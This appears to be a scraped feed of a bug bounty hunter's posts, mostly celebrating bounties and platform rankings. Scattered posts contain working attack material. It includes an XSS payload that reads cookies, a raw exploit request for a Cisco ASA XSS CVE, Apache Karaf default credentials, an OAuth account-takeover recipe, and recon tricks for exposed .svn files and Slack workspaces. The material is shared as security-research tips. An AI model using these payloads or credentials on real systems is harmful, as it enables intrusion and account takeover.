RCE on main website via Okta Log4j?!
11
29
409
29,191
ูŠุง ูƒุฑูŠู…! ~ dependency confusion (package hidden in a JS file). Published it, reported it, and got a callback after 1 week. Allah Kareem.
18
5
295
9,938
A few years ago, I dreamed of finding bugs in top tier targets like Google Last week, I finally got my first confirmed report from @googlevrp Alhamdulillah โค๏ธ
17
4
256
8,177
Alhamdulillah, I earned a bounty for my submission on @bugcrowd bugcrowd.com/sl4x0 #ittakesacrowd Just got the biggest bounty of my life! This is a huge milestone in my journey.
33
7
253
15,410
I've successfully uncovered the trendy XSS vulnerability [CVE-2023-29489] on a high-profile target :D
6
29
240
16,318
The website gives me the ability to create a custom page with a unique URL. The custom page requires inputs for the page title and description. I simply input my payload, save it, then visit the page, and voila! ๐Ÿ”ฅ script><svg/onload=prompt`{document.cookie}`> #bugbountytips
8
22
238
16,753
Another hit of today is ๐—–๐—ฉ๐—˜-๐Ÿฎ๐Ÿฌ๐Ÿฎ๐Ÿฌ-๐Ÿฏ๐Ÿฑ๐Ÿด๐Ÿฌ which is an Unauthenticated POST-based XSS at Cisco Adaptive Security Appliance! POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: example.tld SAMLResponse="><svg/onload=alert('SL4X0')> #bugbountytips #bughunting #cve
2
57
232
17,626
Tal is the weekendโ€™s P1 warrior ๐Ÿซถ๐Ÿป
17
2
219
11,940
2025โ€™s first blood ๐Ÿดโ€โ˜ ๏ธ
15
231
6,948
Excited to share that I've made it to the top 3 ๐Ÿฅ‰on @Bugcrowdโ€™s March leaderboard! What a fantastic month it's been! Grateful for this achievement, Alhamdulillah.
23
4
204
25,785
๐Ÿ”ฅ A new hit on same target: - Victim signs up but website dosen't send mail confirm. - Attacker logs in via Facebook, unchecks email scope. - Site asks for email, attacker enters victimโ€™s. - Site sends confirmation to victim. - Victim clicks, attacker now owns the account.
just bagged my first oauth bug! After grinding and reading up for days, I stumbled on this write-up, applied it, instantly found a bug: muhammad-aamir.medium.com/oaโ€ฆ
15
30
216
23,437
Alhamdulillah, Iโ€™ve made it to the Top 300 all-time hackers on @Bugcrowd!
6
3
181
5,199
I spent a year doing full time huting. Here's the cold, hard, cash-only test I used to see if it was even worth it. Welcome your feedback on my blog post detailing this methodology: blog.sl4x0.xyz/posts/full-tiโ€ฆ #bugbounty #bugbountytips
6
21
177
12,064
I've been diving deep into supply chain attacks for the past month, coding and researching non-stop. It's paying off, and I'll drop my findings and tool after I wrap up scanning. (No GitHub package files scanning, BTW.)
3
2
181
7,534
Alhamdulillah, I hope it's not a duplicate. BWT, I used @xnl_h4ck3r's Waymore tool๐Ÿ”ฅ #bugbounty
7
10
163
9,686
Alhamdulillah, just hit 1000 points on @Bugcrowd! So proud of this achievement and grateful for all the support!โœŒ๐Ÿป
16
162
6,378
Letโ€™s see..
Hello everyone โ™ฅ a little bit write-up of #bugbountytip #bugbountytips I am going to write here ..... Title: getting unauthorized access on 3rd party's/workspaces & and building your checklist for quickly locating bugs there via massive recon we know that its helpful to look for google groups/docs/etc.. Slack as well just like when the amazing @h4x0r_dz shared days ago .. Use google dork "site:join.slack.com" so I was not in a good mode the last months to doing Google Dorks, so what I did was build a checklist ready for me & very huge one for EX: groups.google.com docs.google.com join.slack.com and here is just an example you can add more similar workspaces for your checklist thin I extracted all internet endpoints and as example here join[.]slack[.]com otx.alienvault.com/api/v1/inโ€ฆ virustotal.com/vtapi/v2/domaโ€ฆ web.archive.org/cdx/search/cโ€ฆ you can use the ready tools to do it such as waymore important note: you have to keep your checklist updated every week and from here I just keep looking for the company name or domain name to see if there's anything connected and mostly the company name or domain name in the URL it self EX: tesla join.slack.com/t/Tesla-Interโ€ฆ Ex For Bugs found: 1 unauthorized access to the workspaces (PII | Information disclose) 2 account takeover as Ex: valid signup employee link 3 account takeover as Ex: valid reset password employee link now about Slack, as an example if you found an invitation link for tesla Tesla join.slack.com/t/Tesla-Interโ€ฆ and that link was not valid, don't stop here it will redirect for Ex: tesla-internal[.]slack[.]com here back and start looking manually for endpoints of this subdomain as well EX: web.archive.org/cdx/search/cโ€ฆ now there are a lot of 3rd party's/workspaces I just shared here slack & Google Docs/groups What I wrote is a bit long and annoying to some, so I apologize. I hope, as usual, that this will be useful to all who follow me here. #Bugounty don't forget to retweet if you like it โ™ฅโ™ฅโ™ฅ
4
2
150
9,061
Congratulations to the #FreePalestine team for securing the 3rd spot at #NahamconCTF! ๐Ÿ‡ต๐Ÿ‡ธ
2
10
134
7,408
Thanks @Bugcrowd, you just made my morning! ๐Ÿฆพ
6
1
129
5,608
just bagged my first oauth bug! After grinding and reading up for days, I stumbled on this write-up, applied it, instantly found a bug: muhammad-aamir.medium.com/oaโ€ฆ
4
8
134
24,587
2024 was an amazing year for me, truly an Allah's plan year! I actually managed to increase my bounty earnings a lot more from 2023, landing me almost in the top 200 all-time on @bugcrowd!๐Ÿ˜Ž - Total valid reports: 289 - Critical/High reports: 52 Actively working on Bugcrowd only, with some activity on @Hacker0x01 in the last two quarters! - I improved my skills with new attack vectors and managed to introduce some profit from them this year! - Most of my bounty came from one program, roughly one-third from it. - I collaborated with amazing people this year. My goal for 2025 is to delve deeper into complex attack vectors for web and mobile, aiming to climb the ranks on Bugcrowd to the top 100, while also giving more time to other platforms like HackerOne & HackenProof. #bugbounty #wrapped2024 #bugcrowd #hackerone
16
3
122
6,320
At least I tried to hack @Bugcrowd ๐Ÿ‘€
6
1
116
8,408
Top 200 on @Bugcrowd ๐Ÿงก alhamdulillah, always.
7
121
2,007
A big shoutout to the incredibly talented @sidxparab for creating this amazing cheat sheet! Thanks to this awesome resource, my automation script is now top-notch and running like a dream. Keep up the fantastic work! sidxparab.gitbook.io/subdomaโ€ฆ #bugbountytips #recon
4
32
118
6,082
I earned my first bounty $$$ for my submission on @bugcrowd bugcrowd.com/sl4x0 #ItTakesACrowd
16
3
115
9,009
Mind blown! ๐Ÿคฏ Just discovered @notebooklm - it's incredible! You can input any learning resources (books/blogs/videos/slides) about bugs or tech topics you want to study, then chat about them. It even generates podcast-style conversations between two hosts discussing the content. Game-changer for learning! ๐Ÿš€ #bugbountylearn
3
9
104
6,185
Android App Gantix JailMonkey Root Detection Bypass using Frida! ๐Ÿซก Script: raw.githubusercontent.com/Ayโ€ฆ #BugBountyTips #AndroidHacking
2
27
102
9,689
โ€œHow a โ€˜.gitโ€™ file Leads to Zendesk Panel Takeoverโ€ by Abdelrhman Allam (sl4x0) sl4x0.medium.com/how-a-git-fโ€ฆ
2
13
100
5,107
I made my mother proud of me.
I wish i could have a good night, i am sorry for you my mother. Someday you will be proud of me.
2
95
7,890
How old were you when you realized Burp shows HTTP/2 requests in HTTP/1 format and all this time you were testing smuggling on converted traffic? Me: ๐Ÿ˜ถ portswigger.net/burp/documenโ€ฆ
3
5
98
4,499
I tried with "hooks.slack.com" and found some juicy stuff, and circle keeps going; you and your ideas, webarchive is a treasure.
Hello everyone โ™ฅ a little bit write-up of #bugbountytip #bugbountytips I am going to write here ..... Title: getting unauthorized access on 3rd party's/workspaces & and building your checklist for quickly locating bugs there via massive recon we know that its helpful to look for google groups/docs/etc.. Slack as well just like when the amazing @h4x0r_dz shared days ago .. Use google dork "site:join.slack.com" so I was not in a good mode the last months to doing Google Dorks, so what I did was build a checklist ready for me & very huge one for EX: groups.google.com docs.google.com join.slack.com and here is just an example you can add more similar workspaces for your checklist thin I extracted all internet endpoints and as example here join[.]slack[.]com otx.alienvault.com/api/v1/inโ€ฆ virustotal.com/vtapi/v2/domaโ€ฆ web.archive.org/cdx/search/cโ€ฆ you can use the ready tools to do it such as waymore important note: you have to keep your checklist updated every week and from here I just keep looking for the company name or domain name to see if there's anything connected and mostly the company name or domain name in the URL it self EX: tesla join.slack.com/t/Tesla-Interโ€ฆ Ex For Bugs found: 1 unauthorized access to the workspaces (PII | Information disclose) 2 account takeover as Ex: valid signup employee link 3 account takeover as Ex: valid reset password employee link now about Slack, as an example if you found an invitation link for tesla Tesla join.slack.com/t/Tesla-Interโ€ฆ and that link was not valid, don't stop here it will redirect for Ex: tesla-internal[.]slack[.]com here back and start looking manually for endpoints of this subdomain as well EX: web.archive.org/cdx/search/cโ€ฆ now there are a lot of 3rd party's/workspaces I just shared here slack & Google Docs/groups What I wrote is a bit long and annoying to some, so I apologize. I hope, as usual, that this will be useful to all who follow me here. #Bugounty don't forget to retweet if you like it โ™ฅโ™ฅโ™ฅ
3
5
93
6,237
Alhamdulillah โ™ฅ๏ธ. This month marks my first YEAR on @Bugcrowd, and it's been an incredible journey with the support of an amazing squad. I've focused solely on BBPs, with a few P1s still pending. Can't count everyone who helped me through this, so THANK YOU ALL!
5
3
88
4,125
Just dropped ghmon-cli a powerful, zero-config GitHub/GitLab secrets scanner built for speed, signal, and automation. ๐Ÿ” TruffleHog-powered ๐Ÿ“ข Discord/Telegram alerts ๐Ÿ•ต๏ธโ€โ™‚๏ธ Continuous monitoring ๐Ÿ› ๏ธ OSS. Clone it โ†’ github.com/sl4x0/ghmon #infosec #bugbounty #osint #recon
2
16
90
7,787
I am not sure if everyone knows this but @bugcrowd reevaluates all submissions even when closed!
4
1
89
6,856
Don't usually share things that aren't finalized, but let's stay motivated and get back to hacking after this exam slump #bugbountymotivation
9
76
5,064
I just submitted my first valid report to @GoogleVRP!๐Ÿž
7
79
5,680
Fascinating comment I received since a while ago, thanks @Bugcrowd for the awesome customers!
4
1
81
4,194
Hey everyone! If you were starting bug bounty hunting from scratch, what would you do? I need to brush up on some basics and review some attack methods. Any advice on subscriptions, general tips, books, etc..? Thanks! #bugbounty
15
1
73
14,367
Is that an automation bro : @RelentlessT7
13
72
11,410
3 days grinding to just see this msg. Used ChatGPT, ManusAI, and a lot of human brain debug vibes. AI + human brain = unstoppable combo Hope it boots up smooth after its nap :) Not a TruffleHog wrapper. A standalone tool that just uses truffle as a scanner.
8
1
72
4,296
Sending a huge thanks to @Bugcrowd for the awesome swag! ๐Ÿงก
3
1
69
9,233
#thread #bugbountytips #googlemapapikey #recon ๐Ÿงต Found a Google Map API Key? Follow these steps with me! Google Map API Key starts with "AIzxxxxxxxxxxxxxx" Download this tool for making a clear PoC: github.com/ozguralp/gmapsapiโ€ฆ
9
12
63
8,052
Some cool BACAs to start the weekend w/ @MElguerdawiโœŒ๐Ÿป
8
2
66
12,146
My first P1 at a VDP, Wait for the reports to be disclosed so I can share some cool details :)
7
63
4,778
fastest resolution of the year!
2
63
3,385
My life's ultimate goal! O Allah, grant us the opportunity! ๐Ÿคฒ๐Ÿป
2
5
55
4,718
Just scored a (my first) reward @intigriti, check my profile: app.intigriti.com/profile/slโ€ฆ #HackWithIntigriti๐Ÿ thereโ€™s always something nostalgic about landing your first bounty on a new platform, big thanks to @intigriti for the smooth triage and warm welcome.
6
1
64
2,468
Recently, I got positive feedback from a customer after a policy change discussion. I realized that their respect and appreciation mean more to me than the money. Thanks @Bugcrowd for bringing such great customers to us all.
1
1
61
3,207
Forcing account lockout after multiple wrong password attempts and requires a password reset to access again. A simple 24/7 script runs with wrong passwords login attemps can block victim access his account all the time! What do you think about severity? Yoo, #bugbounty!
19
4
62
13,307
> No matter how far you go in life or how much you master your field, it all ends at the same place, standing before Allah. Donโ€™t forget to prepare for that day
1
4
59
2,636
Thank you @Bugcrowd for this awesome gift!๐Ÿคฉ
4
61
2,717
I donโ€™t usually share stories, but desync attacks are trending nowadays. From day one of my security journey, Iโ€™ve been ambitious to learn them but every time I tried, I failed and gave up. If you read @deadvolvo's blogs on, I promise youโ€™ll be on your way to top-tier on them.
2
1
58
2,621
Have you ever heard about `wc-db` file disclosure?! > you can check it by: https://target[.]com/.svn/wc.db > then you can use this tool to dump all of the website source code: github.com/anantshri/svn-extโ€ฆ #bugbountytips #information #disclosure #infosec
1
14
59
2,993
created a simple blog post about the bug if needed: blog.sl4x0.xyz/posts/the-oauโ€ฆ #bugbountytips
๐Ÿ”ฅ A new hit on same target: - Victim signs up but website dosen't send mail confirm. - Attacker logs in via Facebook, unchecks email scope. - Site asks for email, attacker enters victimโ€™s. - Site sends confirmation to victim. - Victim clicks, attacker now owns the account.
9
58
3,673
โžก๏ธ CVE-2020-3187 - Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal Template: github.com/projectdiscovery/โ€ฆ
1
9
54
5,397
ุฃุณุนุฏ ู…ูุงุฌุฃุฉ ูˆุงู„ู„ู‡ โ™ฅ๏ธ
ุงู† ุดุงุก ุงู„ู„ู‡ ู‡ู†ุตูˆุฑ ุจูˆุฏูƒุงุณุช ู…ุน ู….ุงุจุฑุงู‡ูŠู… ุญุฌุงุฒูŠ @Zigoo0 ุนู† ุงู„ุณุงูŠุจุฑ ุณูŠูƒูŠูˆุฑุชูŠ ูˆ ุฑุญู„ุชู‡ ููŠ ุงู„ุดุบู„ ููŠ ู‡ุฐุง ุงู„ู…ุฌุงู„ ููŠ ุดุฑูƒุงุช ุนุงู„ู…ูŠุฉ ูƒุชูŠุฑ ุฒูŠ visa. ู„ูˆ ุนู†ุฏูƒ ุณุคุงู„ ู„ู„ุถูŠูุŒ ุงูƒุชุจู‡ ููŠ ุชุนู„ูŠู‚ ูˆุงู† ุดุงุก ุงู„ู„ู‡ ู†ุบุทูŠู‡ ููŠ ุงู„ุจูˆุฏูƒุงุณุช.
1
2
57
3,965
๐ŸŸข Shopify Subdomain Takeover! - Be sure to add word #shop to your DNS Brute-force Wordlist! - E.g. โžก๏ธshop[.]target[.]com Template: github.com/projectdiscovery/โ€ฆ #bugbountytips #bughunting #nuclei #infosec #takeover
9
60
4,856
this guy is absolutely killing it with how fast and smoothly he handles reports - Thanks @immunefi
54
3,052
Apache Karaf Web Console Default Credentials! โœ… karaf:karaf #bugbountytips #default #login #Karaf
3
7
53
4,654
When @Bugcrowd knows that you're encounting a final exam tomorrow:
3
1
51
3,676
The main idea behind my new tool is to not only scan GitHub repositories but also restore all deleted commits, then scan the full repo. This approach uncovers more secrets. Read more here: medium.com/@sharon.brizinov/โ€ฆ
Just dropped ghmon-cli a powerful, zero-config GitHub/GitLab secrets scanner built for speed, signal, and automation. ๐Ÿ” TruffleHog-powered ๐Ÿ“ข Discord/Telegram alerts ๐Ÿ•ต๏ธโ€โ™‚๏ธ Continuous monitoring ๐Ÿ› ๏ธ OSS. Clone it โ†’ github.com/sl4x0/ghmon #infosec #bugbounty #osint #recon
9
53
4,588
A tweet of appreciation just for the triager "Lemonade" as they served all of my Response Requests and saved my bills with a 3x $$$ bounties. - Now I have a good Eid Vacation ๐Ÿ–๏ธ
6
2
47
5,364
Itโ€™s been a while since Iโ€™ve seen this - โ€˜triagedโ€™ evokes a reaction ๐Ÿคจ #bugbountylife
2
49
3,017
๐Ÿ”ฅ New Chrome extension: BB-Reformater! Rewrite text on any webpage, directly in your browser. A must-have for bug bounty hunters needing pro reports fast. Ditch the tab-switching between ChatGPT and reportsโ€”start rewriting now! โžก๏ธ github.com/sl4x0/bb-reformatโ€ฆ #bugbounty
1
1
48
3,684
๐ŸŽ‰ Wrapped up 2024 with 148 vulnerability reports on @Hacker0x01! From 71 critical findings to making waves in web security - this swimming lamb is proud to help protect the digital ocean! ๐Ÿ‘๐ŸŠโ€โ™‚๏ธ #HackerOne #InfoSec #BugBounty #ProudHacker hackerone.com/stories-of-202โ€ฆ
1
50
2,267
Alhamdulillah! Me, @Hammad7361, and @HeBo117 have qualified for Bugcrowdโ€™s #CarnivalChAIos 2024 with team HackForGod! Super grateful for this opportunity, especially since we faced some unexpected personal challenges along the way โ€“ but we made it!๐Ÿงก
4
47
2,355
Whoever Kirk is, this man instantly gave off an AURA!๐Ÿ”ฅ
7
1
47
3,964
This encourages me to do more! This is why I love bug bounty! Thanks @trimkadriu & @Bugcrowd!โœŒ๐Ÿป
45
3,132
We made it to the Top 8 at Carnival of ChAIos! ๐ŸŽ‰ Huge thanks to the entire @Bugcrowd team for their incredible support throughout this journey. We learned so much from this experience and canโ€™t wait for next year! ๐Ÿš€
5
42
2,627
I got a swag from Dutch Government @ncsc_nl!๐Ÿ˜Ž #HackWithNCSC
41
2,140
โ€œA small token of appreciation for your well written report, but itโ€™s not actually a vulnerability!โ€ #bugbountytrolls
4
1
41
2,610
Just wrapped up my education, now onto the real adventure: bug bounty hunting!
4
39
4,830
Replying to @Masonhck3571
To add an extra layer of truth to the Mason word, look at the difference between those two screenshots!
2
41
4,665
Eid Mubarak everyone! ๐ŸŒ™โœจ May your eid be filled with love and blessings! #EidAlFitr
2
39
2,695
Is it that time of year again?
2
37
2,335
Eid Mubarak!๐Ÿ
6
2
34
2,291
JWT `none` algo + MongoDB ObjectID = full ATO ๐Ÿ‘
Hello everyone, I am pleased to announce that I have just published an exceptional write-up on the subject of JWT and the analysis ofย user IDsย in order to identify a successfulย IDOR vulnerability. medium.com/@M0X0101/how-i-waโ€ฆ #bugbounty #bugbountytip #bugbountytips #infosec
2
3
37
2,703
If you would like to support Palestine financially, you can donate through this link (in Kuwaiti dinars): palestine2.myfatoorah.com/ksโ€ฆ #GazaUnderAttack #FreePalastine #ุทูˆูุงู†_ุงู„ุฃู‚ุตู‰
5
37
3,619
success in bug bounty isn't just about technical skill it's about professionalism and trust. the @Bugcrowd researcher Code of Conduct is essential reading. everything from out-of-scope testing to disclosure has clear rules. Knowing them protects your reputation and career.
1
1
32
2,456
ู‚ุงุชู„ ูˆู„ูˆ ุจุงู„ูƒู„ู…ุฉ! ู…ูŽุชู‰ ู†ูŽุตุฑู ุงู„ู„ูŽู‘ู‡ูุŸ - ุฃูŽู„ุง ุฅูู†ูŽู‘ ู†ูŽุตุฑูŽ ุงู„ู„ูŽู‘ู‡ู ู‚ูŽุฑูŠุจูŒ #PalestineGenocide #ู…ุณุชุดูู‰_ุงู„ู…ุนู…ุฏุงู†ูŠ #Gaza
1
10
35
2,290
O Allah, Make me strong through You, powerful in You, merciful to those You love. Grant me understanding of reality, awareness of my mission, steadfastness at my post, restraint in my speech, abundance in my deeds.
4
35
1,775
feeling scattered by too many goals and unsure where to find true success? Recommend reading this!
2
31
1,609